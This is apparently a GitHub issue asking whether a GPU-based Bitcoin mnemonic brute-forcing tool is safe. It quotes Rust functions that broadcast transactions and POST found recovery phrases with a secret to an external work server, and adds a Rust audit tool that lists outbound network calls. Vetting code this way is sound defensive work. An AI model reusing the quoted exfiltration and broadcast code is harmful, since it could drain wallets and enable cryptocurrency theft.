Open
Description
I found a piece of code on GitHub that leverages the GPU via OpenCL to brute-force Bitcoin mnemonics. However, I'm concerned about its safety. Specifically, I noticed that the code includes sections that broadcast transactions and send recovery phrases (mnemonics) to an external server. Here are the parts I'm worried about:
- Transaction broadcasting:

```rust
use std::collections::HashMap;

// Pushes a signed raw transaction to BlockCypher's public broadcast endpoint.
// The Result of send() is discarded, so a failed or refused POST goes unnoticed.
fn broadcast_tx(rawtx: String) {
    let mut json_body = HashMap::new();
    json_body.insert("tx", rawtx);
    let client = reqwest::blocking::Client::new();
    let _res = client
        .post("https://api.blockcypher.com/v1/btc/main/txs/push")
        .json(&json_body)
        .send();
}
```
- Sending recovery phrases to an external server:

```rust
use std::collections::HashMap;

// WORK_SERVER_URL and WORK_SERVER_SECRET are constants defined elsewhere in the
// crate (not shown in the issue). Every found mnemonic, its search offset and the
// shared secret are POSTed to <WORK_SERVER_URL>/mnemonic; the Result is discarded.
fn log_solution(offset: u128, mnemonic: String) {
    let mut json_body = HashMap::new();
    json_body.insert("mnemonic", mnemonic);
    json_body.insert("offset", offset.to_string());
    json_body.insert("secret", WORK_SERVER_SECRET.to_string());
    let client = reqwest::blocking::Client::new();
    let _res = client
        .post(&format!("{}/mnemonic", WORK_SERVER_URL.to_string()).to_string())
        .json(&json_body)
        .send();
}
```
My questions are:
- Could this code drain a Bitcoin account if a valid mnemonic is found, especially with the broadcast_tx function?
- Why does the code send the recovery phrase (mnemonic) to an external server? Can this lead to compromising the security of the wallet?
- Is there a legitimate purpose for these external calls, or should they be removed to prevent potential security risks?
I'd appreciate your clarification on whether this code is safe to use as-is or if it requires modifications to avoid malicious behavior.
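A practical first step when vetting a checkout like this is to list every place where data leaves the process, not just the two functions quoted above. The following is an added example written for this page, not code from the issue or from the repository it discusses: a small source audit that scans Rust source text for outbound network sinks and reports the argument each call is given. The sink list is an assumption (extend it for the crates a project actually uses), and the text it scans is the two functions quoted in the issue, reformatted.

```rust
// Added example for this page, not code from the issue or the repository it
// discusses. Lists every outbound network sink in a Rust source text together
// with the argument it is given, so a reviewer can see where data leaves the
// process. The sink list below is an assumption and is not exhaustive.

#[derive(Debug, Clone, PartialEq)]
pub struct Finding {
    pub line: usize,        // 1-based line number in the scanned source
    pub sink: &'static str, // which pattern matched
    pub target: String,     // text inside the call's parentheses, if any
}

// Patterns that hand data to the network (assumed list, not exhaustive).
pub const SINKS: &[&str] = &[
    "reqwest::",
    ".post(",
    ".send()",
    "TcpStream::connect",
    "UdpSocket::bind",
];

// Input for the audit: the two functions quoted in the issue, reformatted.
pub const SAMPLE: &str = r#"fn broadcast_tx(rawtx: String) {
    let mut json_body = HashMap::new();
    json_body.insert("tx", rawtx);
    let client = reqwest::blocking::Client::new();
    let _res = client
        .post("https://api.blockcypher.com/v1/btc/main/txs/push")
        .json(&json_body)
        .send();
}

fn log_solution(offset: u128, mnemonic: String) {
    let mut json_body = HashMap::new();
    json_body.insert("mnemonic", mnemonic);
    json_body.insert("offset", offset.to_string());
    json_body.insert("secret", WORK_SERVER_SECRET.to_string());
    let client = reqwest::blocking::Client::new();
    let _res = client
        .post(&format!("{}/mnemonic", WORK_SERVER_URL.to_string()).to_string())
        .json(&json_body)
        .send();
}
"#;

/// Text inside the parentheses that open right after `pos` on `line`,
/// balanced and aware of string literals (escaped quotes are not handled).
/// Returns an empty string when no call follows the match.
fn call_argument(line: &str, pos: usize) -> String {
    let open = match line[pos..].find('(') {
        Some(o) => pos + o,
        None => return String::new(),
    };
    let start = open + 1;
    let mut depth = 1;
    let mut in_str = false;
    for (i, &b) in line.as_bytes().iter().enumerate().skip(start) {
        match b {
            b'"' => in_str = !in_str,
            b'(' if !in_str => depth += 1,
            b')' if !in_str => {
                depth -= 1;
                if depth == 0 {
                    return line[start..i].to_string();
                }
            }
            _ => {}
        }
    }
    line[start..].to_string() // unbalanced call: report what is there
}

/// Scan `src` line by line and report every sink occurrence.
pub fn find_network_sinks(src: &str) -> Vec<Finding> {
    let mut out = Vec::new();
    for (idx, line) in src.lines().enumerate() {
        if line.trim_start().starts_with("//") {
            continue; // comment-only line
        }
        for &sink in SINKS {
            for (pos, _) in line.match_indices(sink) {
                out.push(Finding {
                    line: idx + 1,
                    sink,
                    target: call_argument(line, pos),
                });
            }
        }
    }
    out
}

fn main() {
    for f in find_network_sinks(SAMPLE) {
        println!("line {:>3}: {:<20} {}", f.line, f.sink, f.target);
    }
}
```

Run against the quoted functions, the audit reports the BlockCypher push URL on the `.post(` in `broadcast_tx` and the `WORK_SERVER_URL`-derived target on the `.post(` in `log_solution`; pointing it at the whole crate shows whether any other sinks exist beyond the two the issue quotes.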